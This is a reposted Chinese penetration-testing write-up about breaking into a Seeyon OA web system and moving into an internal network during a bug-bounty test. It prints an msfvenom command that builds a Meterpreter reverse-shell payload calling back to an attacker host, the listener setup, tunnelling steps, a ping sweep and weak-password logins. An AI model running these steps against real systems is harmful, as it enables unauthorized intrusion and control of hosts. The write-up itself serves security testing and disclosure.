渗透测试：从Web到内网

1337163122

渗透测试：从Web到内网 (qq.com)渗透测试：从Web到内网XiaoBai12138 潇湘信安 5天前
收录于话题
#实战案例50
#Web安全38
#内网安全34

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。 请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

文章来源：先知社区（@XiaoBai12138）
原文地址：https://xz.aliyun.com/t/10058

0x01 前言
由于最近某SRC开启众测福利，所以咱就跟着挖个洞，写篇文章，一举两得。(厚码见谅)嘿嘿

0x02 WEB撕口子
​
Web方面的突破口是一个OA系统

​

致远OA嘛大家都知道，网上复现教程也特别多所以就不在多啰嗦了直接上EXP利用，（工具是本人自己写的哈），地址是：https://github.com/XiaoBai-12138/OA-EXP

​

传完马子冰蝎连接准备后续操作

​

到这里本想添加个用户直接远程登陆服务器了，但是遇到了点问题远程桌面没开启（也可能是换了端口）

​

然后我们试着找找rdp服务看看是否启用，端口是多少
​

1. ​
   
2. tasklist /svc | find "Ter"
   
3. 
   

复制代码

​ 这里我们发现RDP服务存在，端口被改成了3308

​

0x03 内网部分
用IP:3308登陆结果还是拒绝连接，这时候怀疑是只允许内网登陆，我们用MSF生成个马子，先上线MSF再说
​

1. ​
   
2. msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=MSFIP地址 LPORT=端口 -f exe -o /root/vhs.exe
   
3. 
   
4. ​

复制代码

然后开启监听并将root目录下生成的马子上传到目标中运行

1. msf6> use exploit/multi/handler
   
2. msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
   
3. msf6 exploit(multi/handler) > set lhost 127.0.0.1
   
4. msf6 exploit(multi/handler) > set lport 3080
   
5. msf6 exploit(multi/handler) > exploit

复制代码

上线以后查看系统信息，权限等
​

​

​​
发现是用户权限，使用默认的提权来试试，直接OK...

​

接下来搭建个socks5隧道，以便内网横向啥的。这里我使用的是NPS隧道，这个在Github上开源的项目，这里就不细说了，有需要的话我在单独出一篇关于隧道的文章。

搭建好隧道以后使用proxychains连接socks隧道，此时我们MSF机器的IP已经变成目标机的IP地址了

​

这次使用内网的IP登陆远程桌面，已经发现可以登陆了

​

MSF接着信息收集，扫描内网主机发现没域控，那就直接用目标的cmd一句话探测了
​

1. C:\Windows\system32>for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
   
2. for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
   
3. Reply from 192.168.*.21: bytes=32 time<1ms TTL=128
   
4. Reply from 192.168.*.22: bytes=32 time<1ms TTL=128
   
5. Reply from 192.168.*.100: bytes=32 time<1ms TTL=128
   
6. Reply from 192.168.*.101: bytes=32 time<1ms TTL=128
   
7. Reply from 192.168.*.102: bytes=32 time<1ms TTL=128
   
8. Reply from 192.168.*.103: bytes=32 time<1ms TTL=64
   
9. Reply from 192.168.*.105: bytes=32 time<1ms TTL=128
   
10. Reply from 192.168.*.106: bytes=32 time<1ms TTL=128
    
11. Reply from 192.168.*.107: bytes=32 time<1ms TTL=128
    
12. Reply from 192.168.*.108: bytes=32 time<1ms TTL=64
    
13. Reply from 192.168.*.150: bytes=32 time<1ms TTL=128
    
14. Reply from 192.168.*.151: bytes=32 time<1ms TTL=128
    
15. Reply from 192.168.*.155: bytes=32 time<1ms TTL=128
    
16. Reply from 192.168.*.187: bytes=32 time<1ms TTL=128
    
17. Reply from 192.168.*.188: bytes=32 time<1ms TTL=128
    
18. Reply from 192.168.*.189: bytes=32 time<1ms TTL=128
    
19. Reply from 192.168.*.201: bytes=32 time<1ms TTL=128
    
20. Reply from 192.168.*.254: bytes=32 time<1ms TTL=255
    
21. Reply from 192.168.*.254: bytes=32 time<1ms TTL=255

复制代码

​

​

​​ 通过TTL可以看到应该两台Linux机器，直接SSH连接，密码123456789登陆成功。。。

​

Windows也一样，密码123456789图就不贴了没意思。。

成果：

       
•         避免影响人家业务就没有进行批量端口扫描等大量占用带宽的行为就只测了常用端口；
  
         
•         弱口令拿下两台内网Linux服务器；
  
         
•         弱口令拿下多台Windows服务器；
  
         
•         内网弱口令拿下两个后台管理系统；
  
  

修复建议：

       
•         问题漏洞已提交厂商
  
         
•         友情提示大家别因为是内网就放松警惕，那密码直接就123456。。。都整无语了
  
         
•         然后欢迎也大家跟我一起交流学习，文章有哪里不足请各位大佬多多包涵
  
  

​